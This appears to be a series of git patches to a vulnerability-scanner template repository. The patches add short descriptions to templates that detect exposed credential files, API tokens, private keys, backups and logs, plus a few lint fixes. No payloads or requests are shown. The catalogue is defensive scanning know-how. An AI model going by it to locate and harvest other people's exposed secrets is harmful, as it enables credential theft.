a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml index 1fadf5a3d7..a8206f6cf5 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml @@ -4,6 +4,7 @@ info: name: Zzzcms 1.75 - Cross-Site Scripting author: ritikchaddha severity: medium + description: ZzzCMS ( A Lightweight ASP.NET content management system ) is vulnerable to XSS( Cross-Site Scripting ). reference: - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.75%20xss%E6%BC%8F%E6%B4%9E.md metadata: From 5002f4c20f7cbd646270a4e2a7a560b913d5aaaa Mon Sep 17 00:00:00 2001 From: Vikas Gupta <vikasgupta@ip-192-168-29-225.ec2.internal> Date: Tue, 2 Jan 2024 21:17:46 +0530 Subject: [PATCH 008/285] Updated descriptions of template --- http/iot/hp-device-info-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/iot/hp-device-info-detect.yaml b/http/iot/hp-device-info-detect.yaml index 007a0ebc08..2738a92ee7 100644 --- a/http/iot/hp-device-info-detect.yaml +++ b/http/iot/hp-device-info-detect.yaml @@ -4,6 +4,7 @@ info: name: HP Device Info Detection author: pussycat0x severity: low + description: Internal info is disclosed to external users in HP Device. reference: https://www.exploit-db.com/ghdb/6905 metadata: max-request: 1 From 93d41ac5ad316ade27c0da88a283bc59f9d0b04d Mon Sep 17 00:00:00 2001 From: Vikas Gupta <vikasgupta@ip-192-168-29-225.ec2.internal> Date: Tue, 2 Jan 2024 21:23:10 +0530 Subject: [PATCH 009/285] Updated descriptions of template --- http/exposures/backups/php-backup-files.yaml | 1 + http/exposures/logs/npm-log-file.yaml | 1 + http/exposures/tokens/google/fcm-server-key.yaml | 1 + http/exposures/tokens/loqate/loqate-api-key.yaml | 1 + http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml | 1 + http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml | 1 + 6 files changed, 6 insertions(+) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index 9d285095bb..4832c626a8 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -4,6 +4,7 @@ info: name: PHP Source - Backup File Information Disclosure author: StreetOfHackerR007,pwnhxl,mastercho,0xpugazh severity: medium + description: PHP Source File is disclosed to external users. metadata: max-request: 1222 tags: exposure,backup,php,disclosure,fuzz diff --git a/http/exposures/logs/npm-log-file.yaml b/http/exposures/logs/npm-log-file.yaml index e3587aee80..5ef719d4dd 100644 --- a/http/exposures/logs/npm-log-file.yaml +++ b/http/exposures/logs/npm-log-file.yaml @@ -4,6 +4,7 @@ info: name: Publicly accessible NPM Log file author: sheikhrishad,DhiyaneshDk severity: low + description: NPM log file is exposed to external users. reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: diff --git a/http/exposures/tokens/google/fcm-server-key.yaml b/http/exposures/tokens/google/fcm-server-key.yaml index f6bd187a36..11d794bb04 100644 --- a/http/exposures/tokens/google/fcm-server-key.yaml +++ b/http/exposures/tokens/google/fcm-server-key.yaml @@ -4,6 +4,7 @@ info: name: FCM Server Key author: absshax severity: high + description: FCM Server Key is leaked. reference: - https://abss.me/posts/fcm-takeover metadata: diff --git a/http/exposures/tokens/loqate/loqate-api-key.yaml b/http/exposures/tokens/loqate/loqate-api-key.yaml index 3f518665e2..89c6e2f542 100644 --- a/http/exposures/tokens/loqate/loqate-api-key.yaml +++ b/http/exposures/tokens/loqate/loqate-api-key.yaml @@ -4,6 +4,7 @@ info: name: Loqate API Key author: realexp3rt severity: low + description: Loqate API Key is leaked. reference: - https://www.loqate.com/en-gb/home/ metadata: diff --git a/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml b/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml index b9b5042326..a779a0ac56 100644 --- a/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml +++ b/http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Mapbox Token Disclosure author: Devang-Solanki severity: medium + description: Mapbox secret token is exposed to external users. reference: - https://docs.gitguardian.com/secrets-detection/detectors/specifics/mapbox_token - https://github.com/zricethezav/gitleaks/blob/master/cmd/generate/config/rules/mapbox.go diff --git a/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml b/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml index 2ac208a6da..31c18cf748 100644 --- a/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml +++ b/http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Razorpay Client ID Disclosure author: Devang-Solanki severity: high + description: Razorpay Client ID is exposed to external users. reference: - https://github.com/streaak/keyhacks#Razorpay-keys - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey From 465c3d7fb44286f764fcb255566d248cdf5699c4 Mon Sep 17 00:00:00 2001 From: Vikas Gupta <vikasgupta@ip-192-168-29-225.ec2.internal> Date: Tue, 2 Jan 2024 21:46:15 +0530 Subject: [PATCH 010/285] Updated descriptions of template --- http/exposures/files/apache-licenserc.yaml | 1 + http/exposures/files/apdisk-disclosure.yaml | 1 + http/exposures/files/auth-json.yaml | 1 + http/exposures/files/azure-pipelines-exposed.yaml | 1 + http/exposures/files/azuredeploy-json.yaml | 1 + http/exposures/files/cloud-config.yaml | 1 + http/exposures/files/cold-fusion-cfcache-map.yaml | 1 + http/exposures/files/composer-auth-json.yaml | 1 + http/exposures/files/core-dump.yaml | 1 + http/exposures/files/credentials-json.yaml | 1 + http/exposures/files/database-credentials.yaml | 1 + http/exposures/files/docker-cloud.yaml | 1 + http/exposures/files/domcfg-page.yaml | 1 + http/exposures/files/drupal-install.yaml | 1 + http/exposures/files/environment-rb.yaml | 1 + http/exposures/files/exposed-alps-spring.yaml | 1 + http/exposures/files/filezilla.yaml | 1 + http/exposures/files/gcloud-access-token.yaml | 1 + http/exposures/files/gcloud-credentials.yaml | 1 + http/exposures/files/get-access-token-json.yaml | 1 + http/exposures/files/git-mailmap.yaml | 1 + http/exposures/files/go-mod-disclosure.yaml | 1 + http/exposures/files/google-api-private-key.yaml | 1 + http/exposures/files/google-services-json.yaml | 1 + http/exposures/files/iceflow-vpn-disclosure.yaml | 1 + http/exposures/files/jsapi-ticket-json.yaml | 1 + http/exposures/files/kubernetes-etcd-keys.yaml | 1 + http/exposures/files/lazy-file.yaml | 1 + http/exposures/files/npm-cli-metrics-json.yaml | 1 + http/exposures/files/oauth-credentials-json.yaml | 1 + http/exposures/files/openstack-user-secrets.yaml | 1 + http/exposures/files/php-cs-cache.yaml | 1 + http/exposures/files/php-ini.yaml | 1 + http/exposures/files/php-user-ini-disclosure.yaml | 1 + http/exposures/files/phpunit-result-cache-exposure.yaml | 1 + http/exposures/files/putty-private-key-disclosure.yaml | 1 + http/exposures/files/rails-secret-token-disclosure.yaml | 1 + http/exposures/files/ruby-rail-storage.yaml | 1 + http/exposures/files/secret-token-rb.yaml | 1 + http/exposures/files/secrets-file.yaml | 1 + http/exposures/files/sendgrid-env.yaml | 1 + http/exposures/files/service-account-credentials.yaml | 1 + http/exposures/files/shellscripts.yaml | 1 + http/exposures/files/svn-wc-db.yaml | 1 + http/exposures/files/token-json.yaml | 1 + http/exposures/files/vagrantfile-exposure.yaml | 1 + http/exposures/files/ws-ftp-ini.yaml | 1 + http/exposures/files/xampp-environment-variables.yaml | 1 + 48 files changed, 48 insertions(+) diff --git a/http/exposures/files/apache-licenserc.yaml b/http/exposures/files/apache-licenserc.yaml index d803f54c14..90bef42b41 100644 --- a/http/exposures/files/apache-licenserc.yaml +++ b/http/exposures/files/apache-licenserc.yaml @@ -4,6 +4,7 @@ info: name: Apache License File author: DhiyaneshDk severity: low + description: Apache License file is exposed. metadata: verified: true max-request: 1 diff --git a/http/exposures/files/apdisk-disclosure.yaml b/http/exposures/files/apdisk-disclosure.yaml index 3d412ce36c..51b70001a5 100644 --- a/http/exposures/files/apdisk-disclosure.yaml +++ b/http/exposures/files/apdisk-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Apdisk - File Disclosure author: DhiyaneshDk severity: low + description: Apdisk internal file is exposed. reference: - https://discussions.apple.com/thread/250354761 metadata: diff --git a/http/exposures/files/auth-json.yaml b/http/exposures/files/auth-json.yaml index e9d1fdbd80..f4387b16ef 100644 --- a/http/exposures/files/auth-json.yaml +++ b/http/exposures/files/auth-json.yaml @@ -4,6 +4,7 @@ info: name: Auth.json File - Disclosure author: DhiyaneshDk severity: high + description: auth.json file is exposed. metadata: verified: true max-request: 1 diff --git a/http/exposures/files/azure-pipelines-exposed.yaml b/http/exposures/files/azure-pipelines-exposed.yaml index 328f402c00..0d0a233319 100644 --- a/http/exposures/files/azure-pipelines-exposed.yaml +++ b/http/exposures/files/azure-pipelines-exposed.yaml @@ -4,6 +4,7 @@ info: name: Azure Pipelines Configuration File Disclosure author: DhiyaneshDk severity: medium + description: Azure Pipelines internal critical file is disclosed. metadata: verified: true max-request: 2 diff --git a/http/exposures/files/azuredeploy-json.yaml b/http/exposures/files/azuredeploy-json.yaml index 6c7c5bd4d5..6ca848b4d5 100644 --- a/http/exposures/files/azuredeploy-json.yaml +++ b/http/exposures/files/azuredeploy-json.yaml @@ -4,6 +4,7 @@ info: name: Azure Resource Manager Template - File Exposure author: DhiyaneshDk severity: medium + description: Azure Resource Manager deploy file is disclosed. reference: - https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/parameter-files - https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/template-tutorial-use-template-reference?tabs=CLI diff --git a/http/exposures/files/cloud-config.yaml b/http/exposures/files/cloud-config.yaml index 06dbd9efec..b6dfd414bd 100644 --- a/http/exposures/files/cloud-config.yaml +++ b/http/exposures/files/cloud-config.yaml @@ -4,6 +4,7 @@ info: name: Cloud Config File Exposure author: DhiyaneshDK,Hardik-Solanki severity: medium + description: Cloud Config file is exposed. reference: https://www.exploit-db.com/ghdb/7959 metadata: verified: true diff --git a/http/exposures/files/cold-fusion-cfcache-map.yaml b/http/exposures/files/cold-fusion-cfcache-map.yaml index cb515a23ca..8cb3aa2cc5 100644 --- a/http/exposures/files/cold-fusion-cfcache-map.yaml +++ b/http/exposures/files/cold-fusion-cfcache-map.yaml @@ -4,6 +4,7 @@ info: name: Discover Cold Fusion cfcache.map Files author: geeknik severity: low + description: Adobe Cold Fusion cfcache.map file is exposed. reference: - https://securiteam.com/windowsntfocus/5bp081f0ac/ metadata: diff --git a/http/exposures/files/composer-auth-json.yaml b/http/exposures/files/composer-auth-json.yaml index 6ccb478569..e0e0467b28 100644 --- a/http/exposures/files/composer-auth-json.yaml +++ b/http/exposures/files/composer-auth-json.yaml @@ -4,6 +4,7 @@ info: name: Composer-auth Json File Disclosure author: DhiyaneshDK severity: low + description: Composer Auth Josn file is disclosed. reference: https://www.exploit-db.com/ghdb/5768 metadata: verified: true diff --git a/http/exposures/files/core-dump.yaml b/http/exposures/files/core-dump.yaml index c48dc82195..576201b8c7 100644 --- a/http/exposures/files/core-dump.yaml +++ b/http/exposures/files/core-dump.yaml @@ -4,6 +4,7 @@ info: name: Exposed Core Dump - File Disclosure author: kazet severity: medium + description: Exposed Core Dump internal file is disclosed. reference: - https://github.com/hannob/snallygaster/blob/4c5a9b54501f64da96787c2a2e3a12ce2e09c1ab/snallygaster#L295 metadata: diff --git a/http/exposures/files/credentials-json.yaml b/http/exposures/files/credentials-json.yaml index bc62fe4943..21ba857d13 100644 --- a/http/exposures/files/credentials-json.yaml +++ b/http/exposures/files/credentials-json.yaml @@ -4,6 +4,7 @@ info: name: Credentials File Disclosure author: ritikchaddha severity: medium + description: Internal secret file is exposed. metadata: verified: true max-request: 2 diff --git a/http/exposures/files/database-credentials.yaml b/http/exposures/files/database-credentials.yaml index 42f0165f58..1b5dc835c6 100644 --- a/http/exposures/files/database-credentials.yaml +++ b/http/exposures/files/database-credentials.yaml @@ -4,6 +4,7 @@ info: name: Database Credentials File Exposure author: Hardik-Solanki,geeknik severity: low + description: Internal file exposed containing database credentials. reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: diff --git a/http/exposures/files/docker-cloud.yaml b/http/exposures/files/docker-cloud.yaml index 794943b86a..15a2ca052c 100644 --- a/http/exposures/files/docker-cloud.yaml +++ b/http/exposures/files/docker-cloud.yaml @@ -4,6 +4,7 @@ info: name: Docker Cloud Yaml - File Disclosure author: DhiyaneshDK severity: medium + description: Docker cloud internal yaml file is exposed. reference: https://www.exploit-db.com/ghdb/7959 metadata: verified: true diff --git a/http/exposures/files/domcfg-page.yaml b/http/exposures/files/domcfg-page.yaml index a31544c2d6..b7d70e847c 100644 --- a/http/exposures/files/domcfg-page.yaml +++ b/http/exposures/files/domcfg-page.yaml @@ -4,6 +4,7 @@ info: name: Lotus Domino Configuration Page author: gevakun severity: low + description: Lotus Domino configuration file is exposed. reference: - https://twitter.com/Wh11teW0lf/status/1295594085445709824 metadata: diff --git a/http/exposures/files/drupal-install.yaml b/http/exposures/files/drupal-install.yaml index ae67314f87..8b9b588add 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/exposures/files/drupal-install.yaml @@ -4,6 +4,7 @@ info: name: Drupal Install author: NkxxkN severity: low + description: Drupal Install panel exposed. metadata: max-request: 2 shodan-query: http.component:"drupal" diff --git a/http/exposures/files/environment-rb.yaml b/http/exposures/files/environment-rb.yaml index fdabdeb674..bebc74b875 100644 --- a/http/exposures/files/environment-rb.yaml +++ b/http/exposures/files/environment-rb.yaml @@ -4,6 +4,7 @@ info: name: Environment Ruby File Disclosure author: DhiyaneshDK severity: medium + description: Ruby environment file is exposed. metadata: verified: true max-request: 3 diff --git a/http/exposures/files/exposed-alps-spring.yaml b/http/exposures/files/exposed-alps-spring.yaml index ba6c59273c..753f0edb8d 100644 --- a/http/exposures/files/exposed-alps-spring.yaml +++ b/http/exposures/files/exposed-alps-spring.yaml @@ -4,6 +4,7 @@ info: name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS) author: dwisiswant0 severity: medium + description: Exposed Spring Data profile semantics is exposed. reference: - https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ metadata: diff --git a/http/exposures/files/filezilla.yaml b/http/exposures/files/filezilla.yaml index 76e77ee48f..e1bda29086 100644 --- a/http/exposures/files/filezilla.yaml +++ b/http/exposures/files/filezilla.yaml @@ -4,6 +4,7 @@ info: name: Filezilla author: amsda severity: medium + description: Filezilla internal file is exposed. metadata: max-request: 3 tags: exposure,files diff --git a/http/exposures/files/gcloud-access-token.yaml b/http/exposures/files/gcloud-access-token.yaml index 759e8bf8c8..0e50428c86 100644 --- a/http/exposures/files/gcloud-access-token.yaml +++ b/http/exposures/files/gcloud-access-token.yaml @@ -4,6 +4,7 @@ info: name: Google Cloud Access Token author: DhiyaneshDK severity: medium + description: Internal Google Cloud access tokens are exposed. metadata: verified: true max-request: 2 diff --git a/http/exposures/files/gcloud-credentials.yaml b/http/exposures/files/gcloud-credentials.yaml index dccabfda90..de18982318 100644 --- a/http/exposures/files/gcloud-credentials.yaml +++ b/http/exposures/files/gcloud-credentials.yaml @@ -4,6 +4,7 @@ info: name: Google Cloud Credentials author: DhiyaneshDK severity: medium + description: Google Cloud Crdentials file is exposed. metadata: verified: true max-request: 2 diff --git a/http/exposures/files/get-access-token-json.yaml b/http/exposures/files/get-access-token-json.yaml index 9bf72f29f4..d981a37223 100644 --- a/http/exposures/files/get-access-token-json.yaml +++ b/http/exposures/files/get-access-token-json.yaml @@ -4,6 +4,7 @@ info: name: Get Access Token Json author: DhiyaneshDK severity: low + description: Internal file is exposed in Constant Contact Forms wordpress plugin. metadata: verified: true max-request: 2 diff --git a/http/exposures/files/git-mailmap.yaml b/http/exposures/files/git-mailmap.yaml index 91cc4239fd..5430de3f42 100644 --- a/http/exposures/files/git-mailmap.yaml +++ b/http/exposures/files/git-mailmap.yaml @@ -4,6 +4,7 @@ info: name: Git Mailmap File Disclosure author: geeknik,DhiyaneshDK severity: low + description: Git Mailmap file is exposed. reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html metadata: verified: true diff --git a/http/exposures/files/go-mod-disclosure.yaml b/http/exposures/files/go-mod-disclosure.yaml index 79fa65ae69..642e99c076 100644 --- a/http/exposures/files/go-mod-disclosure.yaml +++ b/http/exposures/files/go-mod-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Go.mod Disclosure author: DhiyaneshDk severity: low + description: go.mod internal file is exposed. metadata: verified: true max-request: 1 diff --git a/http/exposures/files/google-api-private-key.yaml b/http/exposures/files/google-api-private-key.yaml index fe2dd1df1b..c5f96b4bce 100644 --- a/http/exposures/files/google-api-private-key.yaml +++ b/http/exposures/files/google-api-private-key.yaml @@ -4,6 +4,7 @@ info: name: Google Api Private Key author: DhiyaneshDK severity: medium + description: Google API private keys are exposed in files. reference: https://www.exploit-db.com/ghdb/6037 metadata: verified: true diff --git a/http/exposures/files/google-services-json.yaml b/http/exposures/files/google-services-json.yaml index 5993dbc248..bfec030fac 100644 --- a/http/exposures/files/google-services-json.yaml +++ b/http/exposures/files/google-services-json.yaml @@ -4,6 +4,7 @@ info: name: Google Service Json author: DhiyaneshDK severity: low + description: google-services.json internal file is exposed. reference: https://www.exploit-db.com/ghdb/6886 metadata: verified: true diff --git a/http/exposures/files/iceflow-vpn-disclosure.yaml b/http/exposures/files/iceflow-vpn-disclosure.yaml index d1a6d37e14..d2eb9bd6ff 100644 --- a/http/exposures/files/iceflow-vpn-disclosure.yaml +++ b/http/exposures/files/iceflow-vpn-disclosure.yaml @@ -4,6 +4,7 @@ info: name: ICEFlow VPN Disclosure author: pikpikcu severity: low + description: ICEFlow VPN internal log file is exposed. metadata: max-request: 8 tags: exposure,files,iceflow,logs diff --git a/http/exposures/files/jsapi-ticket-json.yaml b/http/exposures/files/jsapi-ticket-json.yaml index f7c2675cae..956c021d07 100644 --- a/http/exposures/files/jsapi-ticket-json.yaml +++ b/http/exposures/files/jsapi-ticket-json.yaml @@ -4,6 +4,7 @@ info: name: JsAPI Ticket Json author: DhiyaneshDK severity: low + description: JsAPI Ticket internal file is exposed. reference: https://www.exploit-db.com/ghdb/6070 metadata: verified: true diff --git a/http/exposures/files/kubernetes-etcd-keys.yaml b/http/exposures/files/kubernetes-etcd-keys.yaml index 36a9de5902..ac88e257f7 100644 --- a/http/exposures/files/kubernetes-etcd-keys.yaml +++ b/http/exposures/files/kubernetes-etcd-keys.yaml @@ -4,6 +4,7 @@ info: name: Kubernetes etcd Keys - Exposure author: Hardik-Solanki severity: medium + description: Kubernetes private etcd keys are exposed. reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: diff --git a/http/exposures/files/lazy-file.yaml b/http/exposures/files/lazy-file.yaml index 41eab25d08..aae0c26893 100644 --- a/http/exposures/files/lazy-file.yaml +++ b/http/exposures/files/lazy-file.yaml @@ -4,6 +4,7 @@ info: name: Lazy File Manager author: amsda severity: medium + description: lfm.php file in exposed in Lazy File Manager. metadata: max-request: 1 tags: exposure diff --git a/http/exposures/files/npm-cli-metrics-json.yaml b/http/exposures/files/npm-cli-metrics-json.yaml index 6981ecdb6e..69d7131c69 100644 --- a/http/exposures/files/npm-cli-metrics-json.yaml +++ b/http/exposures/files/npm-cli-metrics-json.yaml @@ -4,6 +4,7 @@ info: name: NPM Anonymous CLI Metrics Json author: DhiyaneshDK severity: low + description: anonymous-cli-metrics.json internal file in NPM is exposed. metadata: verified: true max-request: 2 diff --git a/http/exposures/files/oauth-credentials-json.yaml b/http/exposures/files/oauth-credentials-json.yaml index f8189f427c..eb04246e4a 100644 --- a/http/exposures/files/oauth-credentials-json.yaml +++ b/http/exposures/files/oauth-credentials-json.yaml @@ -4,6 +4,7 @@ info: name: Oauth Credentials Json author: DhiyaneshDK severity: low + description: Oauth Credentials file is exposed. metadata: verified: true max-request: 1 diff --git a/http/exposures/files/openstack-user-secrets.yaml b/http/exposures/files/openstack-user-secrets.yaml index 25e067ca9b..e7f91b81b3 100644 --- a/http/exposures/files/openstack-user-secrets.yaml +++ b/http/exposures/files/openstack-user-secrets.yaml @@ -4,6 +4,7 @@ info: name: OpenStack User Secrets Exposure author: geeknik severity: high + description: Internal user_secrets.yml file is exposed in OpenStack. reference: - https://docs.openstack.org/project-deploy-guide/openstack-ansible/stein/configure.html metadata: diff --git a/http/exposures/files/php-cs-cache.yaml b/http/exposures/files/php-cs-cache.yaml index 61b67db0f0..0e600643d1 100644 --- a/http/exposures/files/php-cs-cache.yaml +++ b/http/exposures/files/php-cs-cache.yaml @@ -4,6 +4,7 @@ info: name: PHP-CS-Fixer Cache - File Disclosure author: DhiyaneshDk severity: medium + description: PHP CS fixer cache internal file is disclosed. reference: - https://www.acunetix.com/vulnerabilities/web/php-cs-fixer-cache-file-publicly-accessible-php_cs-cache/ metadata: diff --git a/http/exposures/files/php-ini.yaml b/http/exposures/files/php-ini.yaml index 659c242a72..c02c61abe7 100644 --- a/http/exposures/files/php-ini.yaml +++ b/http/exposures/files/php-ini.yaml @@ -4,6 +4,7 @@ info: name: Php.ini File Disclosure author: geeknik,DhiyaneshDK severity: low + description: php.ini file is exposed. reference: https://www.php.net/manual/en/configuration.file.php metadata: verified: true diff --git a/http/exposures/files/php-user-ini-disclosure.yaml b/http/exposures/files/php-user-ini-disclosure.yaml index 402ea66d01..e899702fdb 100644 --- a/http/exposures/files/php-user-ini-disclosure.yaml +++ b/http/exposures/files/php-user-ini-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Php User.ini Disclosure author: dhiyaneshDk severity: medium + description: PHP user.ini file is exposed. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/php-user-ini-disclosure.json metadata: diff --git a/http/exposures/files/phpunit-result-cache-exposure.yaml b/http/exposures/files/phpunit-result-cache-exposure.yaml index e4d4c757d1..4e2bf80599 100644 --- a/http/exposures/files/phpunit-result-cache-exposure.yaml +++ b/http/exposures/files/phpunit-result-cache-exposure.yaml @@ -4,6 +4,7 @@ info: name: PHPUnit Result Cache File Exposure author: DhiyaneshDk severity: low + description: PHPUnit cache file is exposed. metadata: verified: true max-request: 1 diff --git a/http/exposures/files/putty-private-key-disclosure.yaml b/http/exposures/files/putty-private-key-disclosure.yaml index 180d0b0e29..43faece800 100644 --- a/http/exposures/files/putty-private-key-disclosure.yaml +++ b/http/exposures/files/putty-private-key-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Putty Private Key Disclosure author: DhiyaneshDk,geeknik severity: medium + description: Putty internal user key file is exposed. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json metadata: diff --git a/http/exposures/files/rails-secret-token-disclosure.yaml b/http/exposures/files/rails-secret-token-disclosure.yaml index c6d9cbab09..5ac60f72de 100644 --- a/http/exposures/files/rails-secret-token-disclosure.yaml +++ b/http/exposures/files/rails-secret-token-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Ruby on Rails Secret Token Disclosure author: dhiyaneshDk severity: medium + description: Ruby on Rals Secret Token file is exposed. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json metadata: diff --git a/http/exposures/files/ruby-rail-storage.yaml b/http/exposures/files/ruby-rail-storage.yaml index 2559e2d80c..6aefa5ed8c 100644 --- a/http/exposures/files/ruby-rail-storage.yaml +++ b/http/exposures/files/ruby-rail-storage.yaml @@ -4,6 +4,7 @@ info: name: Ruby on Rails storage.yml File Disclosure author: DhiyaneshDK severity: low + description: Ruby on Rails storage.yml file is disclosed. metadata: verified: true max-request: 4 diff --git a/http/exposures/files/secret-token-rb.yaml b/http/exposures/files/secret-token-rb.yaml index adc879f42b..6f9fccfc93 100644 --- a/http/exposures/files/secret-token-rb.yaml +++ b/http/exposures/files/secret-token-rb.yaml @@ -4,6 +4,7 @@ info: name: Secret Token Ruby - File Disclosure author: DhiyaneshDK severity: medium + description: Ruby Secret token is exposed. metadata: verified: true max-request: 3 diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml index e2876a89d8..dec89f6dbf 100644 --- a/http/exposures/files/secrets-file.yaml +++ b/http/exposures/files/secrets-file.yaml @@ -4,6 +4,7 @@ info: name: Ruby on Rails secrets.yml File Exposure author: DhiyaneshDK severity: high + description: Ruby on Rails internal secret file is exposed. reference: https://www.exploit-db.com/ghdb/6283 metadata: verified: true diff --git a/http/exposures/files/sendgrid-env.yaml b/http/exposures/files/sendgrid-env.yaml index b77d9b0baa..8abe176195 100644 --- a/http/exposures/files/sendgrid-env.yaml +++ b/http/exposures/files/sendgrid-env.yaml @@ -4,6 +4,7 @@ info: name: SendGrid Env File Exposure author: DhiyaneshDk severity: medium + description: SendGrid file is exposed containing environment variables. metadata: verified: true max-request: 1 diff --git a/http/exposures/files/service-account-credentials.yaml b/http/exposures/files/service-account-credentials.yaml index 332eff1a28..08ce0905ba 100644 --- a/http/exposures/files/service-account-credentials.yaml +++ b/http/exposures/files/service-account-credentials.yaml @@ -4,6 +4,7 @@ info: name: Service Account Credentials File Disclosure author: ritikchaddha severity: medium + description: Service Account Credentials internal file is exposed. metadata: verified: true max-request: 2 diff --git a/http/exposures/files/shellscripts.yaml b/http/exposures/files/shellscripts.yaml index 7d50fd4040..f795427bb2 100644 --- a/http/exposures/files/shellscripts.yaml +++ b/http/exposures/files/shellscripts.yaml @@ -4,6 +4,7 @@ info: name: Public shellscripts author: panch0r3d severity: low + description: This template checks exposure of bash scripts. metadata: max-request: 23 tags: bash,exposure,files diff --git a/http/exposures/files/svn-wc-db.yaml b/http/exposures/files/svn-wc-db.yaml index 5c93b1eb03..a1bfcb7532 100644 --- a/http/exposures/files/svn-wc-db.yaml +++ b/http/exposures/files/svn-wc-db.yaml @@ -4,6 +4,7 @@ info: name: SVN wc.db File Exposure author: Hardik-Solanki,R12W4N severity: medium + description: SVN wc.db file is exposed. reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb diff --git a/http/exposures/files/token-json.yaml b/http/exposures/files/token-json.yaml index 3fd4158ea2..66684a24d4 100644 --- a/http/exposures/files/token-json.yaml +++ b/http/exposures/files/token-json.yaml @@ -4,6 +4,7 @@ info: name: Token Json File Disclosure author: DhiyaneshDK severity: low + description: Internal token.json file is exposed. metadata: verified: true max-request: 2 diff --git a/http/exposures/files/vagrantfile-exposure.yaml b/http/exposures/files/vagrantfile-exposure.yaml index 2b27b988ec..f616e5c0de 100644 --- a/http/exposures/files/vagrantfile-exposure.yaml +++ b/http/exposures/files/vagrantfile-exposure.yaml @@ -4,6 +4,7 @@ info: name: Vagrantfile Exposure author: DhiyaneshDk severity: low + description: Vagrantfile is exposed to external users. metadata: verified: true max-request: 1 diff --git a/http/exposures/files/ws-ftp-ini.yaml b/http/exposures/files/ws-ftp-ini.yaml index 16c906f2dc..bbbe27feb4 100644 --- a/http/exposures/files/ws-ftp-ini.yaml +++ b/http/exposures/files/ws-ftp-ini.yaml @@ -4,6 +4,7 @@ info: name: WS FTP File Disclosure author: DhiyaneshDK severity: low + description: WS FTP file is disclosed. metadata: verified: true max-request: 1 diff --git a/http/exposures/files/xampp-environment-variables.yaml b/http/exposures/files/xampp-environment-variables.yaml index 36ff57b94f..21e0d7fda2 100644 --- a/http/exposures/files/xampp-environment-variables.yaml +++ b/http/exposures/files/xampp-environment-variables.yaml @@ -4,6 +4,7 @@ info: name: XAMPP Environment Variables Exposure author: melbadry9,DhiyaneshDK severity: low + description: printenv.pl file is exposed in XAMPP leaking environment variables. metadata: max-request: 1 tags: exposure,xampp,files From 7c9b2c6d8fd5b0f2dcf42781ed421975732d87be Mon Sep 17 00:00:00 2001 From: Vikas Gupta <vikasgupta@ip-192-168-29-225.ec2.internal> Date: Tue, 2 Jan 2024 21:48:57 +0530 Subject: [PATCH 011/285] Fixed Lint --- http/exposures/backups/zip-backup-files.yaml | 4 ++-- http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml | 2 +- http/vulnerabilities/other/tianqing-info-leak.yaml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index ae605013fc..a8c2b29dfc 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -79,8 +79,8 @@ http: matchers: - type: binary binary: - - "7573746172202000" #tar - - "7573746172003030" #tar + - "7573746172202000" # tar + - "7573746172003030" # tar - "377ABCAF271C" # 7z - "314159265359" # bz2 - "53514c69746520666f726d6174203300" # SQLite format 3. diff --git a/http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml b/http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml index 04fc350428..ed8c587678 100644 --- a/http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml +++ b/http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml @@ -4,7 +4,7 @@ info: name: Huawei Auth Http Server - Arbitrary File Read author: DhiyaneshDk severity: high - description: Huawei Auth HTTP Server is vulnerable to Arbitrary File Read. + description: Huawei Auth HTTP Server is vulnerable to Arbitrary File Read. reference: - https://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498499&idx=1&sn=6850c3e9a3df795e48ba9a10c9772ddd - 